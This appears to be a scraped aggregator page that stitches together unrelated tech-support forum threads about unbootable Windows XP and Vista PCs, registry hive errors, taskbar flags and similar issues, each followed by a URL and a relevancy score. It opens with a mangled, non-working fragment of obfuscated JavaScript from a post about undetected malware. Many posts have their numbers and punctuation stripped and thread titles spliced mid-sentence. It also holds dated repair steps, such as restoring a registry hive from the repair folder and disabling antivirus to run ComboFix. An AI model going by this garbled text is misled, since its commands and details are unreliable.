vhiwyzhho ycchmhvnZZZZZxmodlrck ycchmhvnZZZZZ ycchmhvnZZZZZ ycchmhvnZZZZZ var kbubebolwc this var jksgjsorh kbubebolwcZZZZZvhiwyzhho jksgjsorh uakenars var axvqsxsjewcbr 'qcncarncfkrbfifzybgnymsmbcaarftthdzvwjwmtqsbzgmlvhgtlsygtmnvuhcahtlqpfnfitgjrij sqeyzebpzztihvuxvzqvltsuglaetxeaj' Here is the latest virus total about hours after the first submission https www virustotal com en file a cdd b d ded a a ed a bdc a a cb b cd bab f analysis None of the av products detect it and it will probably be a week until half of them do It seems there are a lot of unnecessary infections if it takes this long for obvious malware to get recognized Maybe antivirus companies ... Read more

A:Why are antivirus programs so slow to flag malware?

This JavaScript looks incomplete to me. Also, did you upload the payload it downloads on VirusTotal to see if it's flagged?

http://www.bleepingcomputer.com/forums/t/622929/why-are-antivirus-programs-so-slow-to-flag-malware/
Relevancy 40.42%

My main problem is similar to others of the Registry File Failure category. But I cannot use my XP CD to boot up, for some reason. I have changed the BIOS to read from the CD first, but the computer goes straight to the HD and then hangs with a hive problem (security). I am running a RAID, and before that's checked, the MBFastTrak checks for IDEs, but I don't know whether I should disable that or not, or how to if I do.

I managed to put the HD on a 2000 Pro machine, it did a chkdsk and fixed some (3) wandering files, but it will not boot.

Sorry if this is redundant. but I couldn't find exactly my problem, since most others seem to be able to repair with their recovery console.

https://forums.techguy.org/threads/cd-unbootable.471643/
Relevancy 40.42%

Mod Edit: Split from http://www.bleepingcomputer.com/forums/topic469322.html/page__p__2850472#entry2850472 - Hamluis.Hi,First time brand new etc.I think I'm having a similar problem with my sisters Acer netbook.I cannot boot into windows in any mode, but can run off my Linux Mint Live USB.I managed to turn off Auto reboot, so below is the main error components.I'd love some help here too!Thanks, Steegs.===============================================STOP: c0000218 {Registry File Failure}The registry cannot load the hive{file}:\SystemRoot\System32\Config\SOFTWAREor its log or alternate.It is corrupt, absent, or not writeable.Beginning dump of physical memoryPhysical memory dump complete.================================================It may be because it only has 1GB of RAM, but I didn't see any pause of actually checking the RAM either....

A:Unbootable

Boot to the XP CD and select R (Recovery Console)At the command prompt type:ren c:\windows\system32\config\software software.oldcopy c:\windows\repair\software c:\windows\system32\configRebootNOTE: All software installed prior to the creation of the above backup file will need to be reinstalled.EDITED to correct software hive info.

http://www.bleepingcomputer.com/forums/t/469774/unbootable/
Relevancy 40.42%

Hello i'm new here please bear with me until i get the feel of how things go around here I've got a pc running on XP not sure about service pack and pc on Help: XP Unbootable i am unable to boot it normally It keeps on restarting as in on a loop So i've Help: Unbootable pc on XP tried the following things but to no avail Safe Mode with or without command prompt Booting on safe mode is giving me a black screen with a long list of sys similar to this multi disk rdisk partition windows system drivers fltmgr sys Recovery and or Debugging when i press f I get a blue screen saying IRQL NOT LESS OR EQUAL Stop x A x c o d x x x Using Bios to change boot sequence to cdrom and booting from a win boot cd it does not work Installing win over it - Installation cannot proceed due to some font error Installing Win XP again over - it does not boot the cd but send me to an advanced options screen similar to when i press f Using command Help: Unbootable pc on XP prompt to format - it says bad command I am really out of ideas and i am not really tech savvy I would really appreciate some help over this issue I would simply like to be able to format the pc and start afresh all over Thank you

A:Help: Unbootable pc on XP

and welcome to the Forum

What i the Brand/Model of the pc? Have you installed or uninstalled any hardware or software just prior to having the problem?

http://www.techsupportforum.com/forums/f10/help-unbootable-pc-on-xp-385799.html
Relevancy 40.42%

I switched on my compaq xp PC this morning to get a non bootable machine. The blue page flashes quickly ( i can see a word "registry" but thats about it it flashes too quickly. I managed to hook the hard drive up to one of my other machines I can access files on the harddrive no problem and backed up all important files. But do not know where to look to find the problem of unbootable, its not a virus as I also used mcaffe on the other machine to check the entire drive.

I dont have a clue how to use recovery if this is what I need to do? I want to just have my machine back, can anyone help ? please.

A:unbootable

Can you get to Safe Mode? If so, you can run some diagnostics form there.

http://www.techsupportforum.com/forums/f10/unbootable-19439.html
Relevancy 40.42%

I am fixing a unbootable nearly friend's old computer that I could not get to boot at first- thread linked below hxxp www techsupportforum com forums f pc-will-not-start- html I finally got it to boot today and was able to run the programs you request I will nearly unbootable wait before I run anything else DDS DDS Ver - - - NTFSx NETWORK Internet Explorer Run by Administrator at on - - Microsoft Windows XP Home Edition GMT - AV Norton AntiVirus Enabled Outdated E A - - -B - C C F FW Norton AntiVirus Enabled Running nearly unbootable Processes C WINDOWS system svchost -k DcomLaunch C WINDOWS system svchost -k rpcss C WINDOWS system svchost exe -k netsvcs C WINDOWS system svchost exe -k NetworkService C WINDOWS system svchost nearly unbootable exe -k LocalService C PROGRA COMMON Stardock SDMCP exe C WINDOWS Explorer EXE C Program Files Spyware Doctor pctsAuxs exe C Program Files Spyware Doctor pctsSvc exe C Program Files Spyware Doctor pctsTray exe C WINDOWS system ctfmon exe C WINDOWS system wbem wmiprvse exe Pseudo HJT Report uStart Page hxxp www google com ig dell hl en amp client dell uSearch Page hxxp www google com hws sb dell en side html hl en amp client dell uSearch Bar hxxp www google com hws sb dell en side html hl en amp client dell uDefault Page URL hxxp www google com ig dell hl en amp client dell uSearchMigratedDefaultURL hxxp www google com search q searchTerms amp sourceid ie amp rls com microsoft en-US amp ie utf amp oe utf mDefault Page URL hxxp www yahoo com mDefault Search URL hxxp us rd yahoo com customize ie defaults su msgr Yahoo mSearch Page hxxp us rd yahoo com customize ie defaults sp msgr Yahoo mStart Page hxxp www yahoo com mWindow Title Microsoft Internet Explorer presented by Comcast mSearch Bar hxxp us rd yahoo com customize ie defaults sb msgr Yahoo SearchBar Home Page uInternet Connection Wizard ShellNext hxxp www virprotect com aff BHO d- ca- c-a f-c b ee - c windows system csseqchk dll BHO amp Yahoo Toolbar Helper d -c f - efb- b - eca - c progra yahoo companion installs cpn yt dll BHO Adobe PDF Reader Link Helper e f-c d - d -b d- b d be b - c program files common files adobe acrobat activex AcroIEHelper dll BHO RealPlayer Download and Record Plugin for Internet Explorer c e -b - bc - - c ca - c program files real realplayer rpbrowserrecordplugin dll BHO Yahoo IE Services Button bab b b- bc- b - d - fc de a - c program files yahoo common yiesrvc dll BHO DriveLetterAccess ca d e- - cf- e - - c windows system dla tfswshx dll BHO EWPBrowseObject Class f e- - e - aaf- bc a a be - c program files canon easy-webprint EWPBrowseLoader dll BHO Symantec Intrusion Prevention d ec - aae- -aeee-f f c - c progra common symant ids IPSBHO dll BHO SSVHelper Class bb-d f - c-b eb-d daf d d - c program files java jre bin ssv dll BHO E D - A- EC-A -BA D E E - No File BHO Windows Live Sign-in Helper d - c - abf- ecc- c - c program files common files microsoft shared windows live WindowsLiveLogin dll BHO Google Toolbar Helper aa ed - dd- d - -cf f - c program files google googletoolbar dll BHO Google Toolbar Notifier BHO af de - d - -b fa-ce b ad d - c program files google googletoolbarnotifier swg dll BHO CBrowserHelperObject Object ca c - b - e-a -a c db f - c program files googleafe GoogleAE dll TB Yahoo Toolbar ef bd -c fb- d - f- d f - c progra yahoo companion installs cpn yt dll TB Easy-WebPrint c -e d- c -aa d- ac baba c - c program files canon easy-webprint Toolband dll TB amp Google c b - - d - b - a cd f - c program files google googletoolbar dll uRun ctfmon exe c windows system ctfmon exe mRun SoundMAXPnP c program files analog devices core smax pnp exe mRun SunJavaUpdateSched quot c program files java jre bin jusched exe quot mRun IntelMeM c program files intel modem event monitor IntelMEM exe mRun DVDLauncher quot c program files cyberlink powerdvd DVDLauncher exe quot mRun dla c windows system dla tfswctrl exe mRun ISUSScheduler quot c program files common files installshield updateservice issch exe... Read more

A:nearly unbootable

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Please stay with me until given the 'all clear' even if symptoms seemingly abate.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by a helper.

Your hard drive is almost full. Having too little free space on your hard drive can compromise system performance.

Quote:

C: is FIXED (NTFS) - 71 GiB total, 7.185 GiB free.

I suggest you move pictures, music, etc. to an external drive or USB stick if you have one and uninstall any programs that are never or hardly ever used.

Please download ComboFix and Save it to your Desktop.

**Note: It is important that it is saved directly to your desktop**

First, we need to install the Windows Recovery Console.

The Windows Recovery Console will allow you to boot up into a special recovery(repair) mode, if needed. This allows us to help you in the case that your computer has a problem after an attempted removal of malware. Also, ComboFix will not address certain types of malware unless the RC is installed. It is a simple procedure that will only take a few moments of your time.

Download the file from this Microsoft page:

Download details: Windows XP Home Edition with Service Pack 2 Utility: Setup Disks for Floppy Boot Install

Save it as it is originally named to your Desktop.

Now close all open windows and programs, including all antivirus and antispyware programs. Get help here

Then drag the setup package onto ComboFix.exe and drop it. Follow the prompts to start ComboFix and when prompted, agree to the End-User License Agreement to install the Recovery Console.

As part of installing the Recovery Console, ComboFix will begin to run. Your desktop may disappear. This is normal. It will return.

ComboFix will now automatically install the Windows Recovery Console onto your computer, which will show up as a new option when booting up your computer. Do not select the Windows Recovery Console option when you start your computer unless requested to by a helper.

Once the Recovery Console is installed, this blue window will appear:

Please continue as follows:
Close/disable all antivirus and antispyware programs so they do not interfere with the running of ComboFix. Get help here
Please click Yes to continue scanning for malware.
Your desktop may go blank. This is normal. It will return when ComboFix is done. ComboFix may reboot your machine. This is normal.
When the tool is finished, it will produce a log for you.

Please post that log, C:\ComboFix.txt, in your next reply.

Please re-enable your antivirus before posting the ComboFix.txt log.

http://www.techsupportforum.com/forums/f100/nearly-unbootable-578392.html
Relevancy 40.42%

MyXp crashed -Blue screen.
I tried to boot from the CD.
It wont repair. When I started XP setup. It asked me to re-format!! & lose all datas. It also did not detect type of File format though it read other old partitions fine.
Can I reinstall XP with out re-formatting?
Thks for your help everybody.
eling

A:XP unbootable

Regardless of its ability to read data if it is asking you to format then you should.
There could be a number of problems that require a format to fix properly like an insufficient MFT size or corrupt partition table entries, you may be able to get at some files now but not for much longer personally I would do as advised format NTFS and dont use 'quick format' as that merely wipes the MFT, proper formatting will create one of sufficient size in a convenient place in the OS partition.

http://www.techsupportforum.com/forums/f10/xp-unbootable-14192.html
Relevancy 40.42%

Ok, I am repairing an old IBM Aptiva 233 computer. I am formating the hard drive to reinstall Win95 on it.

I format the disk, run fdisk (and fdisk /mbr) to clear off everything.

Once the disk is clean I reinstall the OS but now the HD won't boot. I know the drive works because I used it as a slave drive on the same machine and was able to access and save data to it all the time. I have the HD on 'Master' and it is the only HD in the system now.

Why is the HD all of a sudden 'decided' not to boot anymore?

Relevancy 40.42%

okay freshly into win now having obtained a new hdd for my comp I have been running as the admin of my computer since accounts became an unavoidable thing barring the occasional frustration-induced blunder I tend to stay Properly Paranoid in my habits to make sure I have no problems but win doesn't think that I could ever be intelligent enough to have full rights on any account other than the built-in admin account which of course I'd want to avoid using outside emergencies that render other accounts damaged somehow so I'm looking to find out how to make another user account with FULL admin rights not just the constantly have to get permission stuff that a standard snort admin account has full rights that don't involve constantly having to run as administrator yes yes I've heard people trying to get me more paranoid so that I'd endure the added hassles all it does is make me more irate with the situation so if noone's willing to provide me with instruction on this it's probably best for the thread to be left to fall off the board

A:of win7, admin rights, admin accounts, and real admin accounts

I don't know what your problem is. To make another administrator account - Start - Control panel - User Account - 
Manage another account - Create a new account - Give it a name - put a check mark for Administrator - 
click - Create Account. 

http://www.bleepingcomputer.com/forums/t/517811/of-win7-admin-rights-admin-accounts-and-real-admin-accounts/
Relevancy 40.42%

Hello I'm wanted to get some additional information regarding virtual address space of Win bit So that games and programs that are large address aware can benefit from it from the increase So far I understand that this isn't for everyone However if you Flag 32bit, and LAA Virtual Space, U! Address Win7 are able to increase the virtual address space from it's current limit of GB to a figure of bcdedit set increaseuserva or there about is preferred as you don't want to switch too much from the kernal If for any reason it doesn't work you can use bcdedit Win7 32bit, Virtual Address Space, LAA Flag and U! deletevalue increaseuserva to remove the instruction from the bootloader I've read that those that have tried Win7 32bit, Virtual Address Space, LAA Flag and U! this have Win7 32bit, Virtual Address Space, LAA Flag and U! played some games a lot more smoother Others believe that the frame rates improved For me I've seen stutter removed in a few games that I thought was CPU limited However from what I've gathered you will need Win or Vista bit as XP bit doesn't allow the increase of the user virtual address space in increments of or is it You are left with GB option which is too much I've tried this with a few games and Vantage with positive results For example Before the large address tweak on Win After the large address tweak on Win After the large address tweak on Win And LargeAdresssAware flag added to DMarkVantage exe Although the total score for the results are exactly the same Scores for the CPU show the most improvement when enabling LAA for both Win -bit and Dmarkvantage exe So far the results are more seen then just looking at numbers Games like Empire Total Ware are stutter free now and frame rates don't seem to dip as low as it use to In particular raining during a battle is stutter free Road to Independence videos do not stutter etc If others are getting positive results from this why isn't this more discussed with the public at large Why isn't there more information about this So far I have no need for a bit OS at this point Thoughts

A:Win7 32bit, Virtual Address Space, LAA Flag and U!

Does anyone have any insight on this?

http://www.sevenforums.com/general-discussion/24212-win7-32bit-virtual-address-space-laa-flag-u.html
Relevancy 40.42%

i keep getting a flag with a message on my asus notebook saying that network access protection is off and needs to be corrected by turning it on. many posts say it's not necessary, so why won't this message go away? why is it insisting it needs to be turned on? if I do need it how the heck do I do that?

A:Network Protection in Windows 8.1 laptop notification flag

Scroll down to > Network Access Protection http://www.7tutorials.com/introduci...

http://www.computing.net/answers/windows-8/network-protection-in-windows-81-laptop-notification-flag/2070.html
Relevancy 40.42%

Hi, when I turn off my avast antivirus, the white flag on the taskbar doesn't change to the one with the red cross on it, like it used to some time ago. When I hover the pointer over it it pops up a "solve pc issues" message, and when I click on it, it says "turn on avast antivirus". So how do I get the red X flag back?

A:Action Center flag on taskbar doesn't show red x

Go to Action Center in Control panel>(Left side)Change Action Center settings click on that and you should be able to choose which security messages will be displayed;tick Spyware and related protection and Virus protection.

If it's already ticked try this: Action Center>(In the middle)Security (list will drop) >"Virus Protection" -Turn on messages about virus protection ; Spyware and unwanted software protection -Turn on messages about Spyware and unwanted software protection.

http://www.sevenforums.com/general-discussion/386105-action-center-flag-taskbar-doesnt-show-red-x.html
Relevancy 40.42%

Someting I noticed in my Outlook 2003 - when right-clicking to mark a flag as complete the option is dimmed out??

All ok to open the Contact and choose Actions, Follow Up, and selecting the Completed check box, but kind of curious why I don't have the shortcut option??

A:Solved: Outlook 2003 - Right Click to complete flag not available?

Hiya

Are you still having this problem? If so, when you're looking at the Inbox, does the flag actually show, as in a column? If its not, enable it by doing this:

On the View menu, point to Arrange By, and then click Custom. Click Other Settings, and then under Other Options, select the Show Quick Flag column check box.

Then, see if the option is still greyed out. Also, are you clicking on multiple emails, or just the one?

Regards

eddie

https://forums.techguy.org/threads/solved-outlook-2003-right-click-to-complete-flag-not-available.421279/
Relevancy 40.42%

Taskbar Properties Notification area Customize Turn Action be Center cannot turned System Flag on Icon system icons on or off Action Center is Off and grayed out I actually want it showing all the time Restore default icon behaviors and checking Always show all icons and notifications on the taskbar does not bring it back either It is possible this issue could be related to Windows firewall becoming disabled and non-startable over a month ago This problem was corrected by McAfee nd level tech support because I had just terminated McAfee Security Suite available through Cox Communications free and replaced it with Microsoft Action Center Flag System Icon cannot be turned on Security Essentials I have attached the McAfee merge registry fixes bfe amp mpssfc they gave me to run I might Action Center Flag System Icon cannot be turned on have also lost Action Center icon at that time but not noticed it When I noticed the loss I found the Action Center Action Center Flag System Icon cannot be turned on service was not present at all and was able to restart it with the attached registry merge fixes However I cannot get the Action Center icon to reappear I ran a scannow sfc and have attached the sfcdetails file showing repeated errors with taskmon ini that could not be repaired I do not have any Windows Restore points today though yesterday I had several but they were all dated Jun I know I have done system backups so this concerns me I do have an Acronis backup dated Apr a Dell reinstallation disk and have read Brink's post on a repair install using latest official Windows with SP ISO file here Windows SP ISO from Digital River My Digital Life and use Windows USB-DVD Download Tool to create a bootable DVD or USB flash drive with the ISO to do the repair install with I could do a clean install also but have a great deal of data and programs I do not want to have to install from scratch Microsoft Security Essentials full scan did not show any problems with my system I do run two utilities to maintain my system System Mechanic and TuneuP Utilities Though the problem seems minor as long as nothing else is wrong it is irritating but I could learn to live with it and check Action Center manually from time to time I also received an error message yesterday when a new user account I wanted to test with was denied creation The error message was quot The User Profile Service service failed the login User profile cannot be loaded I took the action Windows forum said to do if this happened but still could not create a new user account I would appreciate any help or recovery techniques or comments on my system's behavior

A:Action Center Flag System Icon cannot be turned on

I have the same issue---did you solve it?

http://www.sevenforums.com/general-discussion/235866-action-center-flag-system-icon-cannot-turned.html
Relevancy 40.42%

Hey there guys So I ve got a lend of a friend s copy of Assassin s Creed and Creed Assassin's laggy jumpy IV: Flag Black very IV Black Flag testing it out before I buy it on Steam The installation seemed to go absolutely fine but for some reason the game is very jumpy and there is a sound video lag as well This is strange as my computer s specs should be Assassin's Creed IV: Black Flag very jumpy and laggy good enough to run the game on it s highest settings yet even on its lowest it has the exact same issues with its lag I can t work out why this is as I can play games as simple as Black amp White and as good as Skyrim on their max settings without any issues whatsoever What might be causing this problem as it s simply making the game rather unbearable I have also done a stress test on my CPU RAM and GPU my graphics card made a strange little sound when it was being D tested but otherwise it went absolutely fine and I got great results Specs Operating System Windows Home Premium -bit SP CPU Intel Core i K GHz C Sandy Bridge nm Technology RAM GB Dual-Channel DDR MHz - - - Motherboard ASUSTeK COMPUTER INC P P EVO LGA C Graphics PKB CALL email protected MB NVIDIA GeForce GTX Gigabyte C Storage GB OCZ-AGILITY ATA Device SSD C GB Western Digital WD Ext HDD USB Device USB SATA C Optical Drives ATAPI iHAS B ATA Device Audio Realtek High Definition Audio nbsp

https://forums.techguy.org/threads/assassins-creed-iv-black-flag-very-jumpy-and-laggy.1115190/
Relevancy 40.42%

As I was making an orb for my signature, I realised that some of you might actually also like an orb or icon of your country. I probably have most countries in the world's flags, so if you want an orb or icon then post your requests here (icon/png/jpeg) and I will do one for you....no problem!

Here are some examples:

A:Custom made country flag orbs/icons.

Very nice. My beautiful wife is from the Philippines. Will you do one for her?

http://www.sevenforums.com/customization/20963-custom-made-country-flag-orbs-icons.html
Relevancy 40.42%

If you want your signature on your country's flag done, then put in your request, and I will make a template. (Or sig.)

This thread is only for when you want anything done regarding a country flag. Please visit Sergio's thread for any other signature requests, Custom Made Sig and Avatar

Examples,

Or if you want it in perspective, or if you just want the flag, or orb inserted in your sig, no problem.

Some examples of my sig,

Mods. I would like to maybe merge these 2 threads together, but would like to ammend the title. My apologies for any inconvenience caused!

A:Custom made country flag signature templates.

Sounds great mate, have linked to this thread in the first post of the "custom made sig and avatar thread"
Custom Made Sig and Avatar

http://www.sevenforums.com/customization/21072-custom-made-country-flag-signature-templates.html
Relevancy 40.42%

I've seen plenty like these. These were detections from Sophos Virus Removal Tool that I checked on. I decided neither warranted removing.

https://malwaretips.com/threads/why-are-security-products-prone-to-flag-uninstall-files.52524/
Relevancy 40.42%

I am trying to install Uptodate, a medical software. The installer file stops installation with a message that the installer cannot run in graphic mode, try with -console or -silent flag. The same installation worked smoothly in my XP based system. I am currently using Windows 7 home basic (64 bit). I dont know how to run the above mentioned flags and what they mean. Please help!!

A:console and silent flag requirement for software installation

Try Compatibility Mode with Windows XP SP2 or 3.

Oli

http://www.sevenforums.com/software/107079-console-silent-flag-requirement-software-installation.html
Relevancy 40.42%

Hello everyone !

I have a problem with my application "Babylon dictionary".
the little flag icon beside any dictionary name has disappeared and there is just a point instead of a flag distinguishing every dictionary.

Here is a screen shot :

http://imgh.us/babl.jpg

Any idea what might be the problem ?

Thanks!

http://www.sevenforums.com/software/397798-babylon-dictionary-interface-problem-flag-icon-has-gone.html
Relevancy 40.42%

How to disable Action Center White Flag on system tray in Windows 7 .

it appears even if no current issues detected.

It started to popup recnetly before it never did.

Thanks

A:Disable Action Center Flag on system tray

Hi see this Make Windows 7's Action Center less annoying | News | TechRadar

http://www.techsupportforum.com/forums/f217/disable-action-center-flag-on-system-tray-636985.html
Relevancy 40.42%

Hello everyone !

I have a problem with my application "Babylon dictionary".
the little flag icon beside any dictionary name has disappeared and there is just a point instead of a flag distinguishing every dictionary.

Here is a screen shot :

http://imgh.us/babl.jpg

Any idea what might be the problem ?

Thanks!

http://www.pchelpforum.com/software-support/130076-babylon-dictionary-interface-problem-flag-icon-has-gone.html
Relevancy 40.42%

Hi, I have a problem with windows 7 32 bit.

When you start the pc the logo / flag flashes on Windows 7 and the whole pc goes crazy. I have already tried another power supply and the system re-installed but that brought nothing. Bios has also been updated and I have also made clear cmos.

Perhaps knowledge of the problem, or know someone a solution for this?

My system:
ASUS M4A785TD - EVO V
AMD PHENOM II 955
4 GB GEIL DDR3 12800 (2 x 2 GB)
ATI HD3850
550 W power supply
Windows 7 Ultimate 32 bit

Need your suggestions and comments ..
Thank you very much

A:Windows 7 logo/flag flashes during boot process

I have the exact same problem. I believe this started for me after I installed some new fonts. They are deleted now, but the logo still flashes.

Really annoying, the PC has been acting strange lately, and I guess it might be a virus. Norton and SUPERAntiSpyware can't seem to find anything, though.

http://www.sevenforums.com/bsod-help-support/57891-windows-7-logo-flag-flashes-during-boot-process.html
Relevancy 39.99%

We BSOD Unbootable and had bought a HP Pavilion about a year ago and I had set it up and we were happy with it I got called out of town and didn t make a set of recovery discs for it I forgot all about them until we started having problems at the end of Aug I was out of town the first couple BSOD and Unbootable of times it happened but my wife was able to get it going again by using the repair function in the SAFE START area But now it doesn t work When it boots up we get the start screen with the four options ESC F F or F then if we don t do anything it loads the files then after a few seconds the BSOD appears with A problem has been detected and Technical information STOP x E xFFFFFFFC xFFFFF AD DB xFFFFFA AEAA xFFFFFA AE The same message appears whenever we try to start it So far I have tried all of the safe boot options with no success I can t even get the repair screen with the various options to appear The system diagnostics screen shows that everything is OK the roll back options doesn t do anything either Not having a set of recovery discs I have tried using the following programs System Recovery CD Trinity Recovery Kit VISTA Recovery Disc UBCD Windows P E Super Windows Plus V The programs will run but not fix the problem s I even went so far as to get LINUX running in the form of UBUNTU KNOPPX BLUEWHITE While these work not knowing LINUX I have a problem getting around to check things out I feel that I am running out of options Reading about others having similar problems I am just about at the point of going to option B and pulling out some of the RAM one of the help sites said that one of the updates didn t work with more than GB of RAM or option C purchasing and installing a full version of Windows but I decided to finally ask for help HELP Any ideas The system is HP Pavilion Elite m c-b PC Intel Core Quad Q GB RAM SAMSUNG GB HDD ATI Radeon HD card with MB Windows VISTA Home Premium w SP

A:BSOD and Unbootable

Sounds like it is a driver or hardware problem.
If the computer is only a year you can always
go to where you bought it and have them look at it.
Or you can call HP and ask for help. They may be able to
help you right over the phone.
My sister had problems like that it turned out to be the
motherboard. Luck she had the 3 years from microcenter they replaced it for nothing.
They came right to the house and fixed it.

http://www.vistax64.com/crashes-debugging/260451-bsod-unbootable.html
Relevancy 39.99%

That MozBackup utility works great with Firefox. But what about restoring all of that profile stuff when the system won't boot, and so you can't create the PCV file with that backup utility? I know where to recover the files from: C:\Documents and Settings\USERNAME\Application Data\Mozilla\Firefox folder. I know that you can reinstall FireFox on a new computer, then drop in the recovered profile folder, then edit the .INI file to point to the recovered profile folder. However when I tested this method, passwords didn't seem to transfer. Bookmarks worked again but not passwords. Could it be that passwords have to be exported with a tool, like MozBackup, otherwise they just won't work? Are these passwords somehow tied to the registry?

http://www.techsupportforum.com/forums/f131/unbootable-cant-use-mozbackup-395667.html
Relevancy 39.99%

I have a computer with Windows Vista Ultimate 32-bit. I think the file system might be corrupt. When I start the computer, I would get the Vista loading bar, and then I would get a black screen. Now when I start it, it gives me a screen to choose between normal startup and the built in startup repair program. If I choose startup repair, it freezes on the loading screen. Knoppix recognizes the hard drive and is able to mount it. If I try to use the Vista installation disk to repair the operating system, it freezes while running startup repair. According to Microsoft's help database, these are two signs of file system corruption. PcMinistry's EBCD doesn't have any helpful programs that support NTFS. Any help with this problem would be appreciated. It would also be nice if someone could find a bootable disk that has checkdisk on it. Thanks.

A:Unbootable Vista

The Startup Repair disk has chkdsk built into it as one of it's checks.

File corruption can be caused by many things - so I'd first suggest running a diagnostic on your hard drive. You can download a free test from the website of your hard drive manufacturer.

http://www.bleepingcomputer.com/forums/t/150593/unbootable-vista/
Relevancy 39.99%

I am running on a Dell Dimension Desktop with Windows XP SP Up until three days ago my computer was functioning fine with absolutely no major problems except for the occasional adware and spyware which I always clean up However I woke up a couple morning ago to find that my computer was off though I knew I hadn't turned it off as I rarely do Therefore I pressed the restard button but nothing happened I tried again pressing harder and still no response from the computer I checked all the power cords made sure that power was indeed flowing Unbootable Computers through the cord by connecting it to another computer and did a couple of other minor things and nothing worked I have no opened up the chasy of the machine yet but I am curious if anyone might have any idea why it is not responding when I try to boot it up To add to the problem this afternoon another of my computers went down in the similar fashion apparently just powering off No warning no-one at Unbootable Computers the keyboard and like the first it will not boot again I am not sure what the issue is but any tips or ideas would be greatly appreciated

A:Unbootable Computers

The top suspect is probably the power supply. When you open the computer with the power connected, do you see an LED on the MB lit? If you hit the power switch, does the P/S fan "twitch" at all?

http://www.techsupportforum.com/forums/f10/unbootable-computers-29608.html
Relevancy 39.99%

For about a year my computer has been acting up, I ran about a dozen different virus programs and was able to finally start up the computer normally.

Currently I can no longer startup windows out of safe mode, prior to this it would take about 5-10 restarts before windows would load.  sometimes it would freeze at the windows logo and others at the login screen. When I am finally able to startup normally, more often than not, it would be fine for hours reguardless of what im doing.  Every once in a while during the startup it just loses all power and turns off... im at a loss..

A:Freezing/unbootable

This could be due to any number of things, but first things first - back-up your data at the next opportunity.

This may be the next time you get the computer to work either normally or in safe mode - Windows Explorer works in both. If you cannot get it to boot into Windows at all, then use a bootable Puppy Linux CD. You can get it from here as well as instructions on how to use it :

http://puppylinux.org/main/Overview%20and%20Getting%20Started.htm

Then I would be inclined to check your hard drive. Run chkdsk /r at a command prompt and / or Seagate tools for DOS. If these show your hard drive to be healthy the next step is to consider re-installing Windows. If the hard drive tests show doubts about your drive, then it's time for a new drive and a full re-install of everything.

But back up your data at the first opportunity.

Chris Cosgrove

http://www.bleepingcomputer.com/forums/t/512158/freezingunbootable/
Relevancy 39.99%

I have a HD that is bad. It hangs on the splash screen where the little bar goes across the screen, loading the OS. I can boot to a Linux CD and mount the drive and get the contents off it.

I'm want to know if it is possible to retrieve the Product Key from the HD this way.

Also, I originally made a Ghost backup and I have it on DVD. There are 4 files on the first DVD that are .GHO files. I want the system back the way it was when I made the ghost backup, but I don't think it is possible. I am putting in 2 500GB drives, RAID 1, with a 50GB main partition. Would it be possible to get any information from these files?

Much thanks in advanc!

https://forums.techguy.org/threads/how-can-i-retreive-an-xp-pro-key-from-an-unbootable-bad-hd.760514/